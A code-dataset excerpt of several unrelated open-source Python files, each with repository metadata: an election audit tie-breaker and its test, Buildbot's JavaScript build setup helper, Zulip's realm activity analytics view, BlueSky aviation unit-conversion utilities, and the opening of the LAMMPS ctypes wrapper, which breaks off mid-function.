:return: A function which takes a string as input and writes it to the
appropriate file.
:rtype: function
"""
if out_f is not None:
sys.stdout = open(out_f, AuditTieBreaker.WRITE_OPT)
return lambda x : print(x)
def _visit(self, v, linear_order):
""" Explores the neighbors of the given node recursively and then adds the
explored node to the head of the linear order.
:param v: A candidate ID.
:type v: str or int
:param linear_order: The linear order of candidate IDs so far.
:type linear_order: list
"""
if v in linear_order:
# Do not explore a node twice.
return
random.shuffle(self._vertices[v])
for u in self._vertices[v]:
self._visit(u, linear_order)
linear_order.insert(0, v)
def load_events(self, events_f):
""" Loads all tie-breaking events specified in `events_f`.
:param events_f: A string representing the name of a file to read all tie-
breaking events from.
:type events_f: str
"""
# Read tie-breaking events from JSON file.
with open(events_f, AuditTieBreaker.READ_OPT) as json_file:
events = json.load(json_file).get(AuditTieBreaker.EVENTS_KEY)
if events is None:
raise Exception(AuditTieBreaker.EVENTS_FILE_ERROR_MSG.format(events_f))
# Construct audit tie-breaking graph.
self._print_fn(AuditTieBreaker.BUILDING_GRAPH_MSG)
for event in events:
try:
round_num, candidate_ids, resolution, case_num = event
except:
raise Exception(AuditTieBreaker.EVENTS_FILE_ERROR_MSG.format(events_f))
if len(resolution) == 1:
# Cases 2, 3 - `resolution` is a single candidate ID.
if case_num == 2:
for cid in candidate_ids:
if cid != resolution:
self._vertices[resolution].append(cid)
self._print_fn(AuditTieBreaker.ADDED_EDGE_MSG.format(2, resolution, cid))
else:
for cid in candidate_ids:
if cid != resolution:
self._vertices[cid].append(resolution)
self._print_fn(AuditTieBreaker.ADDED_EDGE_MSG.format(3, cid, resolution))
else:
# Case 1 - `resolution` is a permutation of candidate IDs.
for src_cid, dest_cid in itertools.combinations(resolution, 2):
self._vertices[src_cid].append(dest_cid)
self._print_fn(AuditTieBreaker.ADDED_EDGE_MSG.format(1, src_cid, dest_cid))
# Determine a random topological sorting of the vertices in the audit tie-breaking graph.
vertices = sorted(self._vertices.keys())
random.shuffle(vertices)
linear_order = []
for v in vertices:
self._visit(v, linear_order)
self._linear_order = {linear_order[i] : i for i in range(len(linear_order))}
self._print_fn(AuditTieBreaker.LINEAR_ORDER_MSG.format(AuditTieBreaker.COMMA_DELIM.join(linear_order)))
# Verify linear order is consistent with the real election's tie-breakin events.
self._print_fn(AuditTieBreaker.VERIFY_LINEAR_ORDER_MSG)
for event in events:
round_num, candidate_ids, resolution, case_num = event
assert self.break_tie(candidate_ids, case_num) == resolution
self._print_fn(AuditTieBreaker.IS_CONSISTENT_MSG)
def break_tie(self, candidate_ids, case_num):
""" Returns the resolution for the given candidate IDs and case number.
:param candidate_ids: A list of candidate IDs.
:type candidate_ids: list
:param case_num: A integer identifying the tie-breaking case.
:type case_num: int
:return: The resolution for the given candidate IDs and case number.
:rtype: A single candidate ID (cases 2,3) or a permutation of the given cadndidate IDs
(case 1).
"""
cids_to_order = {cid : self._linear_order[cid] for cid in candidate_ids}
resolution = sorted(cids_to_order, key=cids_to_order.__getitem__)
result = resolution # Get permutation of candidates.
if case_num == 2:
result = resolution[0] # Get candidate to elect.
elif case_num == 3:
result = resolution[-1] # Get candidate to exclude.
self._print_fn(AuditTieBreaker.TIE_BREAK_MSG.format(candidate_ids, result, case_num))
return result
def test_audit_tie_breaker():
""" Tests the `AuditTieBreaker` implementation. """
# Setup tie-breaking events JSON to test implementation.
TMP_TEST_EVENTS_JSON = 'tmp_test_tie_breaking_events.json'
events = {
'events': [
(1, ['A', 'B', 'C'], ['B', 'C', 'A'], 1),
(7, ['D', 'E', 'F'], 'E', 3),
(12, ['D', 'G'], 'G', 2),
],
}
with open(TMP_TEST_EVENTS_JSON, 'w') as f:
f.write(json.dumps(events))
# Test `AuditTieBreaker` implementation.
audit_tb = AuditTieBreaker(['A', 'B', 'C', 'D', 'E', 'F', 'G'], verbose=True)
audit_tb.load_events(TMP_TEST_EVENTS_JSON)
audit_tb._print_fn('= Running AuditTieBreaker tests...')
assert audit_tb.break_tie(['A', 'B', 'C'], 1) == ['B', 'C', 'A']
assert audit_tb.break_tie(['D', 'E', 'F'], 3) == 'E'
assert audit_tb.break_tie(['D', 'G'], 2) == 'G'
assert audit_tb.break_tie(['B', 'F'], 2) == 'B' # Test depends on random.seed of 1.
assert audit_tb.break_tie(['B', 'F'], 3) == 'F' # Test depends on random.seed of 1.
# Clean up temporary test data file.
os.unlink(TMP_TEST_EVENTS_JSON)
audit_tb._print_fn(' --> Tests PASSED!')
test_audit_tie_breaker() # Runs AuditTieBreaker Tests.
|
ron-rivest/2016-aus-senate-audit
|
rivest/audit_tie_breaker.py
|
Python
|
apache-2.0
| 13,136
|
[
"ASE"
] |
a23eac3bc113f45eb9cb463a0a72dec3089ea027593adcb0c8d9aa71a04a4592
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
# Method to add build step taken from here
# https://seasonofcode.com/posts/how-to-add-custom-build-steps-and-commands-to-setuppy.html
import datetime
import distutils.cmd
import os
import re
import subprocess
import sys
from distutils.version import LooseVersion
from subprocess import PIPE
from subprocess import STDOUT
from subprocess import Popen
import setuptools.command.build_py
import setuptools.command.egg_info
from setuptools import setup
old_listdir = os.listdir
def listdir(path):
# patch listdir to avoid looking into node_modules
l = old_listdir(path)
if "node_modules" in l:
l.remove("node_modules")
return l
os.listdir = listdir
def check_output(cmd):
"""Version of check_output which does not throw error"""
popen = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = popen.communicate()[0].strip()
if not isinstance(out, str):
out = out.decode(sys.stdout.encoding)
return out
def gitDescribeToPep440(version):
# git describe produce version in the form: v0.9.8-20-gf0f45ca
# where 20 is the number of commit since last release, and gf0f45ca is the short commit id preceded by 'g'
# we parse this a transform into a pep440 release version 0.9.9.dev20 (increment last digit and add dev before 20)
VERSION_MATCH = re.compile(r'(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)(\.post(?P<post>\d+))?(-(?P<dev>\d+))?(-g(?P<commit>.+))?')
v = VERSION_MATCH.search(version)
if v:
major = int(v.group('major'))
minor = int(v.group('minor'))
patch = int(v.group('patch'))
if v.group('dev'):
patch += 1
dev = int(v.group('dev'))
return "{}.{}.{}-dev{}".format(major, minor, patch, dev)
if v.group('post'):
return "{}.{}.{}.post{}".format(major, minor, patch, v.group('post'))
return "{}.{}.{}".format(major, minor, patch)
return v
def mTimeVersion(init_file):
cwd = os.path.dirname(os.path.abspath(init_file))
m = 0
for root, dirs, files in os.walk(cwd):
for f in files:
m = max(os.path.getmtime(os.path.join(root, f)), m)
d = datetime.datetime.utcfromtimestamp(m)
return d.strftime("%Y.%m.%d")
def getVersionFromArchiveId(git_archive_id='$Format:%ct %d$'):
""" Extract the tag if a source is from git archive.
When source is exported via `git archive`, the git_archive_id init value is modified
and placeholders are expanded to the "archived" revision:
%ct: committer date, UNIX timestamp
%d: ref names, like the --decorate option of git-log
See man gitattributes(5) and git-log(1) (PRETTY FORMATS) for more details.
"""
# mangle the magic string to make sure it is not replaced by git archive
if not git_archive_id.startswith('$For''mat:'):
# source was modified by git archive, try to parse the version from
# the value of git_archive_id
match = re.search(r'tag:\s*v([^,)]+)', git_archive_id)
if match:
# archived revision is tagged, use the tag
return gitDescribeToPep440(match.group(1))
# archived revision is not tagged, use the commit date
tstamp = git_archive_id.strip().split()[0]
d = datetime.datetime.utcfromtimestamp(int(tstamp))
return d.strftime('%Y.%m.%d')
return None
def getVersion(init_file):
"""
Return BUILDBOT_VERSION environment variable, content of VERSION file, git
tag or 'latest'
"""
try:
return os.environ['BUILDBOT_VERSION']
except KeyError:
pass
try:
cwd = os.path.dirname(os.path.abspath(init_file))
fn = os.path.join(cwd, 'VERSION')
with open(fn) as f:
return f.read().strip()
except IOError:
pass
version = getVersionFromArchiveId()
if version is not None:
return version
try:
p = Popen(['git', 'describe', '--tags', '--always'], stdout=PIPE, stderr=STDOUT, cwd=cwd)
out = p.communicate()[0]
if (not p.returncode) and out:
v = gitDescribeToPep440(str(out))
if v:
return v
except OSError:
pass
try:
# if we really can't find the version, we use the date of modification of the most recent file
# docker hub builds cannot use git describe
return mTimeVersion(init_file)
except Exception:
# bummer. lets report something
return "latest"
# JS build strategy:
#
# Obviously, building javascript with setuptools is not really something supported initially
#
# The goal of this hack are:
# - override the distutils command to insert our js build
# - has very small setup.py
#
# from buildbot_pkg import setup_www
#
# setup_www(
# ...
# packages=["buildbot_myplugin"]
# )
#
# We need to override the first command done, so that source tree is populated very soon,
# as well as version is found from git tree or "VERSION" file
#
# This supports following setup.py commands:
#
# - develop, via egg_info
# - install, via egg_info
# - sdist, via egg_info
# - bdist_wheel, via build
# This is why we override both egg_info and build, and the first run build
# the js.
class BuildJsCommand(distutils.cmd.Command):
"""A custom command to run JS build."""
description = 'run JS build'
already_run = False
def initialize_options(self):
"""Set default values for options."""
def finalize_options(self):
"""Post-process options."""
def run(self):
"""Run command."""
if self.already_run:
return
package = self.distribution.packages[0]
if os.path.exists("gulpfile.js") or os.path.exists("webpack.config.js"):
yarn_version = check_output("yarn --version")
assert yarn_version != "", "need nodejs and yarn installed in current PATH"
yarn_bin = check_output("yarn bin").strip()
commands = []
commands.append(['yarn', 'install', '--pure-lockfile'])
if os.path.exists("gulpfile.js"):
commands.append([os.path.join(yarn_bin, "gulp"), 'prod', '--notests'])
elif os.path.exists("webpack.config.js"):
commands.append(['yarn', 'run', 'build'])
shell = bool(os.name == 'nt')
for command in commands:
self.announce('Running command: {}'.format(str(" ".join(command))),
level=distutils.log.INFO)
subprocess.check_call(command, shell=shell)
self.copy_tree(os.path.join(package, 'static'), os.path.join(
"build", "lib", package, "static"))
with open(os.path.join("build", "lib", package, "VERSION"), "w") as f:
f.write(self.distribution.metadata.version)
with open(os.path.join(package, "VERSION"), "w") as f:
f.write(self.distribution.metadata.version)
self.already_run = True
class BuildPyCommand(setuptools.command.build_py.build_py):
"""Custom build command."""
def run(self):
self.run_command('build_js')
super().run()
class EggInfoCommand(setuptools.command.egg_info.egg_info):
"""Custom egginfo command."""
def run(self):
self.run_command('build_js')
super().run()
def setup_www_plugin(**kw):
package = kw['packages'][0]
if 'version' not in kw:
kw['version'] = getVersion(os.path.join(package, "__init__.py"))
setup(cmdclass=dict(
egg_info=EggInfoCommand,
build_py=BuildPyCommand,
build_js=BuildJsCommand),
**kw)
|
anish/buildbot
|
pkg/buildbot_pkg.py
|
Python
|
gpl-2.0
| 8,359
|
[
"GULP"
] |
a585d12ff7c4658962a0a5778ef2f6298cf1fc3c634edc57c818da3976bca4f2
|
import itertools
from datetime import datetime
from typing import Any, Dict, List, Optional, Set, Tuple
from django.db import connection
from django.db.models.query import QuerySet
from django.http import HttpRequest, HttpResponse, HttpResponseNotFound
from django.shortcuts import render
from django.utils.timezone import now as timezone_now
from psycopg2.sql import SQL
from analytics.views.activity_common import (
format_date_for_activity_reports,
get_user_activity_summary,
make_table,
user_activity_link,
)
from zerver.decorator import require_server_admin
from zerver.models import Realm, UserActivity
def get_user_activity_records_for_realm(realm: str, is_bot: bool) -> QuerySet:
fields = [
"user_profile__full_name",
"user_profile__delivery_email",
"query",
"client__name",
"count",
"last_visit",
]
records = UserActivity.objects.filter(
user_profile__realm__string_id=realm,
user_profile__is_active=True,
user_profile__is_bot=is_bot,
)
records = records.order_by("user_profile__delivery_email", "-last_visit")
records = records.select_related("user_profile", "client").only(*fields)
return records
def realm_user_summary_table(
all_records: List[QuerySet], admin_emails: Set[str]
) -> Tuple[Dict[str, Any], str]:
user_records = {}
def by_email(record: QuerySet) -> str:
return record.user_profile.delivery_email
for email, records in itertools.groupby(all_records, by_email):
user_records[email] = get_user_activity_summary(list(records))
def get_last_visit(user_summary: Dict[str, Dict[str, datetime]], k: str) -> Optional[datetime]:
if k in user_summary:
return user_summary[k]["last_visit"]
else:
return None
def get_count(user_summary: Dict[str, Dict[str, str]], k: str) -> str:
if k in user_summary:
return user_summary[k]["count"]
else:
return ""
def is_recent(val: datetime) -> bool:
age = timezone_now() - val
return age.total_seconds() < 5 * 60
rows = []
for email, user_summary in user_records.items():
email_link = user_activity_link(email, user_summary["user_profile_id"])
sent_count = get_count(user_summary, "send")
cells = [user_summary["name"], email_link, sent_count]
row_class = ""
for field in ["use", "send", "pointer", "desktop", "ZulipiOS", "Android"]:
visit = get_last_visit(user_summary, field)
if field == "use":
if visit and is_recent(visit):
row_class += " recently_active"
if email in admin_emails:
row_class += " admin"
val = format_date_for_activity_reports(visit)
cells.append(val)
row = dict(cells=cells, row_class=row_class)
rows.append(row)
def by_used_time(row: Dict[str, Any]) -> str:
return row["cells"][3]
rows = sorted(rows, key=by_used_time, reverse=True)
cols = [
"Name",
"Email",
"Total sent",
"Heard from",
"Message sent",
"Pointer motion",
"Desktop",
"ZulipiOS",
"Android",
]
title = "Summary"
content = make_table(title, cols, rows, has_row_class=True)
return user_records, content
def realm_client_table(user_summaries: Dict[str, Dict[str, Any]]) -> str:
exclude_keys = [
"internal",
"name",
"user_profile_id",
"use",
"send",
"pointer",
"website",
"desktop",
]
rows = []
for email, user_summary in user_summaries.items():
email_link = user_activity_link(email, user_summary["user_profile_id"])
name = user_summary["name"]
for k, v in user_summary.items():
if k in exclude_keys:
continue
client = k
count = v["count"]
last_visit = v["last_visit"]
row = [
format_date_for_activity_reports(last_visit),
client,
name,
email_link,
count,
]
rows.append(row)
rows = sorted(rows, key=lambda r: r[0], reverse=True)
cols = [
"Last visit",
"Client",
"Name",
"Email",
"Count",
]
title = "Clients"
return make_table(title, cols, rows)
def sent_messages_report(realm: str) -> str:
title = "Recently sent messages for " + realm
cols = [
"Date",
"Humans",
"Bots",
]
query = SQL(
"""
select
series.day::date,
humans.cnt,
bots.cnt
from (
select generate_series(
(now()::date - interval '2 week'),
now()::date,
interval '1 day'
) as day
) as series
left join (
select
date_sent::date date_sent,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
(not up.is_bot)
and
date_sent > now() - interval '2 week'
group by
date_sent::date
order by
date_sent::date
) humans on
series.day = humans.date_sent
left join (
select
date_sent::date date_sent,
count(*) cnt
from zerver_message m
join zerver_userprofile up on up.id = m.sender_id
join zerver_realm r on r.id = up.realm_id
where
r.string_id = %s
and
up.is_bot
and
date_sent > now() - interval '2 week'
group by
date_sent::date
order by
date_sent::date
) bots on
series.day = bots.date_sent
"""
)
cursor = connection.cursor()
cursor.execute(query, [realm, realm])
rows = cursor.fetchall()
cursor.close()
return make_table(title, cols, rows)
@require_server_admin
def get_realm_activity(request: HttpRequest, realm_str: str) -> HttpResponse:
data: List[Tuple[str, str]] = []
all_user_records: Dict[str, Any] = {}
try:
admins = Realm.objects.get(string_id=realm_str).get_human_admin_users()
except Realm.DoesNotExist:
return HttpResponseNotFound()
admin_emails = {admin.delivery_email for admin in admins}
for is_bot, page_title in [(False, "Humans"), (True, "Bots")]:
all_records = list(get_user_activity_records_for_realm(realm_str, is_bot))
user_records, content = realm_user_summary_table(all_records, admin_emails)
all_user_records.update(user_records)
data += [(page_title, content)]
page_title = "Clients"
content = realm_client_table(all_user_records)
data += [(page_title, content)]
page_title = "History"
content = sent_messages_report(realm_str)
data += [(page_title, content)]
title = realm_str
return render(
request,
"analytics/activity.html",
context=dict(data=data, realm_link=None, title=title),
)
|
eeshangarg/zulip
|
analytics/views/realm_activity.py
|
Python
|
apache-2.0
| 7,466
|
[
"VisIt"
] |
321f1a37e9a0d65e34a6619e1c0c7a421216dcd740cfda04fa027e9175bf6d1a
|
"""
Miscellaneous modules
Modules:
txt2alt(txt): read altitude[ft] from txt (FL ot ft)
txt2spd(spd,h): read CAS or Mach and convert to TAS for given altitude
tim2txt(t) : convert time[s] to HH:MM:SS.hh
i2txt(i,n) : convert integer to string of n chars with leading zeros
Created by : Jacco M. Hoekstra
"""
from numpy import *
from time import strftime, gmtime
from .aero import cas2tas, mach2tas, kts
def txt2alt(txt):
"""Convert text to altitude in ft: also FL300 => 30000. as float"""
# First check for FL otherwise feet
try:
if txt.upper()[:2] == 'FL' and len(txt) >= 4: # Syntax check Flxxx or Flxx
return 100. * int(txt[2:])
else:
return float(txt)
except ValueError:
return -1e9
def tim2txt(t):
"""Convert time to timestring: HH:MM:SS.hh"""
return strftime("%H:%M:%S.", gmtime(t)) + i2txt(int((t - int(t)) * 100.), 2)
def txt2tim(txt):
"""Convert text to time in seconds:
HH
HH:MM
HH:MM:SS
HH:MM:SS.hh
"""
timlst = txt.split(":")
t = 0.
# HH
if len(timlst[0])>0 and timlst[0].isdigit():
t = t+3600.*int(timlst[0])
# MM
if len(timlst)>1 and len(timlst[1])>0 and timlst[1].isdigit():
t = t+60.*int(timlst[1])
# SS.hh
if len(timlst)>2 and len(timlst[2])>0:
if timlst[2].replace(".","0").isdigit():
t = t + float(timlst[2])
return t
def i2txt(i, n):
"""Convert integer to string with leading zeros to make it n chars long"""
return '{:0{}d}'.format(i, n)
def txt2spd(txt, h):
"""Convert text to speed (EAS [kts]/MACH[-] to TAS[m/s])"""
if len(txt) == 0:
return -1.
try:
if txt[0] == 'M':
M_ = float(txt[1:])
if M_ >= 20: # Handle M95 notation as .95
M_ = M_ * 0.01
acspd = mach2tas(M_, h) # m/s
elif txt[0] == '.' or (len(txt) >= 2 and txt[:2] == '0.'):
spd_ = float(txt)
acspd = mach2tas(spd_, h) # m/s
else:
spd_ = float(txt) * kts
acspd = cas2tas(spd_, h) # m/s
except:
return -1.
return acspd
def col2rgb(txt):
cols = {"black": (0, 0, 0), "white": (255, 255, 255), "green": (0, 255, 0),
"red": (255, 0, 0), "blue": (0, 0, 255), "magenta": (255, 0, 255),
"yellow": (240, 255, 127), "amber": (255, 255, 0), "cyan": (0, 255, 255)}
try:
rgb = cols[txt.lower().strip()]
except:
rgb = cols["white"] # default
return rgb
def degto180(angle):
"""Change to domain -180,180 """
return (angle + 180.) % 360 - 180.
def degtopi(angle):
"""Change to domain -pi,pi """
return (angle + pi) % (2.*pi) - pi
def findnearest(lat, lon, latarr, lonarr):
"""Find index of nearest postion in numpy arrays with lat and lon"""
if len(latarr) > 0 and len(latarr) == len(lonarr):
coslat = cos(radians(lat))
dy = radians(lat - latarr)
dx = coslat * radians(degto180(lon - lonarr))
d2 = dx * dx + dy * dy
idx = list(d2).index(d2.min())
return idx
else:
return -1
def cmdsplit(cmdline, trafids=None):
cmdline = cmdline.strip()
if len(cmdline) == 0:
return '', []
# Use both comma and space as a separator: two commas mean an empty argument
while cmdline.find(",,") >= 0:
cmdline = cmdline.replace(",,", ",@,") # Mark empty arguments
# Replace comma's by space
cmdline = cmdline.replace(",", " ")
# Split using spaces
cmdargs = cmdline.split() # Make list of cmd arguments
# Adjust for empty arguments
for i in range(len(cmdargs)):
if cmdargs[i] == "@":
cmdargs[i] = ""
# If a traffic id list is passed, check if command and first argument need to be switched
if trafids and len(cmdargs) > 1 and trafids.count(cmdargs[0]):
cmdargs[0:2] = cmdargs[1::-1]
# return command, argumentlist
return cmdargs[0], cmdargs[1:]
def txt2lat(lattxt):
"""txt2lat: input txt: N52'14'13.5 or N52"""
txt = lattxt.upper().replace("N", "").replace("S", "-") # North positive, South negative
neg = txt.count("-") > 0
if txt.count("'") > 0 or txt.count('"') > 0:
txt = txt.replace('"', "'") # replace " by '
degs = txt.split("'")
div = 1
lat = 0
if neg:
f = -1.
else:
f = 1.
for xtxt in degs:
if len(xtxt) > 0:
try:
lat = lat + f * abs(float(xtxt)) / float(div)
div = div * 60
except:
print("txt2lat value error:",lattxt)
return 0.0
else:
lat = float(txt)
return lat
# Return float
def txt2lon(lontxt):
"""txt2lat: input txt: N52'14'13.5 or N52"""
# It should first be checked if lontxt is a regular float, to avoid removing
# the 'e' in a scientific-notation number.
try:
lon = float(lontxt)
# Leading E will trigger error ansd means simply East,just as W = West = Negative
except:
txt = lontxt.upper().replace("E", "").replace("W", "-") # East positive, West negative
neg = txt.count("-") > 0
# Use of "'" and '"' as degrees/minutes/seconds
# Also "N52'"
if txt.count("'") > 0 or txt.count('"') > 0:
txt = txt.replace('"', "'") # replace " by '
degs = txt.split("'")
div = 1
lon = 0.0
if neg:
f = -1.
else:
f = 1.
for xtxt in degs:
if len(xtxt)>0.0:
try:
lon = lon + f * abs(float(xtxt)) / float(div)
except:
print("txt2lon value error:",lontxt)
return 0.0
div = div * 60
else: # Cope with "W65"without "'" or '"', also "-65" or "--65"
try:
neg = txt.count("-") > 0
if neg:
f = -1.
else:
f = 1.
lon = f*abs(float(txt))
except:
print("txt2lon value error:",lontxt)
return 0.0
return lon
def lat2txt(lat):
d,m,s = float2degminsec(abs(lat))
return "NS"[lat<0] + "%02d'%02d'"%(int(d),int(m))+str(s)+'"'
def lon2txt(lon):
d,m,s = float2degminsec(abs(lon))
return "EW"[lon<0] + "%03d'%02d'"%(int(d),int(m))+str(s)+'"'
def latlon2txt(lat,lon):
return lat2txt(lat)+" "+lon2txt(lon)
def deg180(dangle):
""" Convert any difference in angles to interval [ -180,180 ) """
return (dangle + 180.) % 360. - 180.
def float2degminsec(x):
deg = int(x)
minutes = int(x*60.) - deg *60.
sec = int(x*3600.) - deg*3600. - minutes*60.
return deg,minutes,sec
def findall(lst,x):
# Find indices of multiple occurences of x in lst
idx = []
i = 0
found = True
while i<len(lst) and found:
try:
i = lst[i:].index(x)+i
idx.append(i)
i = i + 1
found = True
except:
found = False
return idx
|
ethertricity/bluesky
|
bluesky/tools/misc.py
|
Python
|
gpl-3.0
| 7,322
|
[
"Amber"
] |
2641973c247af2126477595d8358f5e696f244b8ea258da75db20c75954808d5
|
# ----------------------------------------------------------------------
# LAMMPS - Large-scale Atomic/Molecular Massively Parallel Simulator
# http://lammps.sandia.gov, Sandia National Laboratories
# Steve Plimpton, sjplimp@sandia.gov
#
# Copyright (2003) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
#
# See the README file in the top-level LAMMPS directory.
# -------------------------------------------------------------------------
# Python wrappers on LAMMPS library via ctypes
# for python3 compatibility
from __future__ import print_function
# imports for simple LAMMPS python wrapper module "lammps"
import sys,traceback,types
from ctypes import *
from os.path import dirname,abspath,join
from inspect import getsourcefile
# imports for advanced LAMMPS python wrapper modules "PyLammps" and "IPyLammps"
from collections import namedtuple
import os
import select
import re
import sys
def get_ctypes_int(size):
if size == 4:
return c_int32
elif size == 8:
return c_int64
return c_int
class MPIAbortException(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return repr(self.message)
class lammps(object):
# detect if Python is using version of mpi4py that can pass a communicator
has_mpi4py_v2 = False
try:
from mpi4py import MPI
from mpi4py import __version__ as mpi4py_version
if mpi4py_version.split('.')[0] == '2':
has_mpi4py_v2 = True
except:
pass
# create instance of LAMMPS
def __init__(self,name="",cmdargs=None,ptr=None,comm=None):
self.comm = comm
self.opened = 0
# determine module location
modpath = dirname(abspath(getsourcefile(lambda:0)))
self.lib = None
# if a pointer to a LAMMPS object is handed in,
# all symbols should already be available
try:
if ptr: self.lib = CDLL("",RTLD_GLOBAL)
except:
self.lib = None
# load liblammps.so unless name is given
# if name = "g++", load liblammps_g++.so
# try loading the LAMMPS shared object from the location
# of lammps.py with an absolute path,
# so that LD_LIBRARY_PATH does not need to be set for regular install
# fall back to loading with a relative path,
# typically requires LD_LIBRARY_PATH to be set appropriately
if not self.lib:
try:
if not name: self.lib = CDLL(join(modpath,"liblammps.so"),RTLD_GLOBAL)
else: self.lib = CDLL(join(modpath,"liblammps_%s.so" % name),
RTLD_GLOBAL)
except:
if not name: self.lib = CDLL("liblammps.so",RTLD_GLOBAL)
else: self.lib = CDLL("liblammps_%s.so" % name,RTLD_GLOBAL)
# if no ptr provided, create an instance of LAMMPS
# don't know how to pass an MPI communicator from PyPar
# but we can pass an MPI communicator from mpi4py v2.0.0 and later
# no_mpi call lets LAMMPS use MPI_COMM_WORLD
# cargs = array of C strings from args
# if ptr, then are embedding Python in LAMMPS input script
# ptr is the desired instance of LAMMPS
# just convert it to ctypes ptr and store in self.lmp
if not ptr:
# with mpi4py v2, can pass MPI communicator to LAMMPS
# need to adjust for type of MPI communicator object
# allow for int (like MPICH) or void* (like OpenMPI)
if lammps.has_mpi4py_v2 and comm != None:
if lammps.MPI._sizeof(lammps.MPI.Comm) == sizeof(c_int):
MPI_Comm = c_int
else:
MPI_Comm = c_void_p
narg = 0
cargs = 0
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
for i in range(narg):
if type(cmdargs[i]) is str:
cmdargs[i] = cmdargs[i].encode()
cargs = (c_char_p*narg)(*cmdargs)
self.lib.lammps_open.argtypes = [c_int, c_char_p*narg, \
MPI_Comm, c_void_p()]
else:
self.lib.lammps_open.argtypes = [c_int, c_int, \
MPI_Comm, c_void_p()]
self.lib.lammps_open.restype = None
self.opened = 1
self.lmp = c_void_p()
comm_ptr = lammps.MPI._addressof(comm)
comm_val = MPI_Comm.from_address(comm_ptr)
self.lib.lammps_open(narg,cargs,comm_val,byref(self.lmp))
else:
self.opened = 1
if cmdargs:
cmdargs.insert(0,"lammps.py")
narg = len(cmdargs)
for i in range(narg):
if type(cmdargs[i]) is str:
cmdargs[i] = cmdargs[i].encode()
cargs = (c_char_p*narg)(*cmdargs)
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(narg,cargs,byref(self.lmp))
else:
self.lmp = c_void_p()
self.lib.lammps_open_no_mpi(0,None,byref(self.lmp))
# could use just this if LAMMPS lib interface supported it
# self.lmp = self.lib.lammps_open_no_mpi(0,None)
else:
# magic to convert ptr to ctypes ptr
if sys.version_info >= (3, 0):
# Python 3 (uses PyCapsule API)
pythonapi.PyCapsule_GetPointer.restype = c_void_p
pythonapi.PyCapsule_GetPointer.argtypes = [py_object, c_char_p]
self.lmp = c_void_p(pythonapi.PyCapsule_GetPointer(ptr, None))
else:
# Python 2 (uses PyCObject API)
pythonapi.PyCObject_AsVoidPtr.restype = c_void_p
pythonapi.PyCObject_AsVoidPtr.argtypes = [py_object]
self.lmp = c_void_p(pythonapi.PyCObject_AsVoidPtr(ptr))
# optional numpy support (lazy loading)
self._numpy = None
# set default types
self.c_bigint = get_ctypes_int(self.extract_setting("bigint"))
self.c_tagint = get_ctypes_int(self.extract_setting("tagint"))
self.c_imageint = get_ctypes_int(self.extract_setting("imageint"))
def __del__(self):
if self.lmp and self.opened:
self.lib.lammps_close(self.lmp)
self.opened = 0
def close(self):
if self.opened: self.lib.lammps_close(self.lmp)
self.lmp = None
self.opened = 0
def version(self):
return self.lib.lammps_version(self.lmp)
def file(self,file):
if file: file = file.encode()
self.lib.lammps_file(self.lmp,file)
# send a single command
def command(self,cmd):
if cmd: cmd = cmd.encode()
self.lib.lammps_command(self.lmp,cmd)
if self.uses_exceptions and self.lib.lammps_has_error(self.lmp):
sb = create_string_buffer(100)
error_type = self.lib.lammps_get_last_error_message(self.lmp, sb, 100)
error_msg = sb.value.decode().strip()
if error_type == 2:
raise MPIAbortException(error_msg)
raise Exception(error_msg)
# send a list of commands
def commands_list(self,cmdlist):
cmds = [x.encode() for x in cmdlist if type(x) is str]
args = (c_char_p * len(cmdlist))(*cmds)
self.lib.lammps_commands_list(self.lmp,len(cmdlist),args)
# send a string of commands
def commands_string(self,multicmd):
if type(multicmd) is str:
multicmd = multicmd.encode()
self.lib.lammps_commands_string(self.lmp,c_char_p(multicmd))
# extract global info
def extract_global(self,name,type):
if name: name = name.encode()
if type == 0:
self.lib.lammps_extract_global.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_global.restype = POINTER(c_double)
else: return None
ptr = self.lib.lammps_extract_global(self.lmp,name)
return ptr[0]
# extract per-atom info
def extract_atom(self,name,type):
if name: name = name.encode()
if type == 0:
self.lib.lammps_extract_atom.restype = POINTER(c_int)
elif type == 1:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_int))
elif type == 2:
self.lib.lammps_extract_atom.restype = POINTER(c_double)
elif type == 3:
self.lib.lammps_extract_atom.restype = POINTER(POINTER(c_double))
else: return None
ptr = self.lib.lammps_extract_atom(self.lmp,name)
return ptr
# extract lammps type byte sizes
def extract_setting(self, name):
if name: name = name.encode()
self.lib.lammps_extract_atom.restype = c_int
return int(self.lib.lammps_extract_setting(self.lmp,name))
@property
def numpy(self):
if not self._numpy:
import numpy as np
class LammpsNumpyWrapper:
def __init__(self, lmp):
self.lmp = lmp
def extract_atom_iarray(self, name, nelem, dim=1):
if dim == 1:
tmp = self.lmp.extract_atom(name, 0)
ptr = cast(tmp, POINTER(c_int * nelem))
else:
tmp = self.lmp.extract_atom(name, 1)
ptr = cast(tmp[0], POINTER(c_int * nelem * dim))
a = np.frombuffer(ptr.contents, dtype=np.intc)
a.shape = (nelem, dim)
return a
def extract_atom_darray(self, name, nelem, dim=1):
if dim == 1:
tmp = self.lmp.extract_atom(name, 2)
ptr = cast(tmp, POINTER(c_double * nelem))
else:
tmp = self.lmp.extract_atom(name, 3)
ptr = cast(tmp[0], POINTER(c_double * nelem * dim))
a = np.frombuffer(ptr.contents)
a.shape = (nelem, dim)
return a
self._numpy = LammpsNumpyWrapper(self)
return self._numpy
# extract compute info
def extract_compute(self,id,style,type):
if id: id = id.encode()
if type == 0:
if style > 0: return None
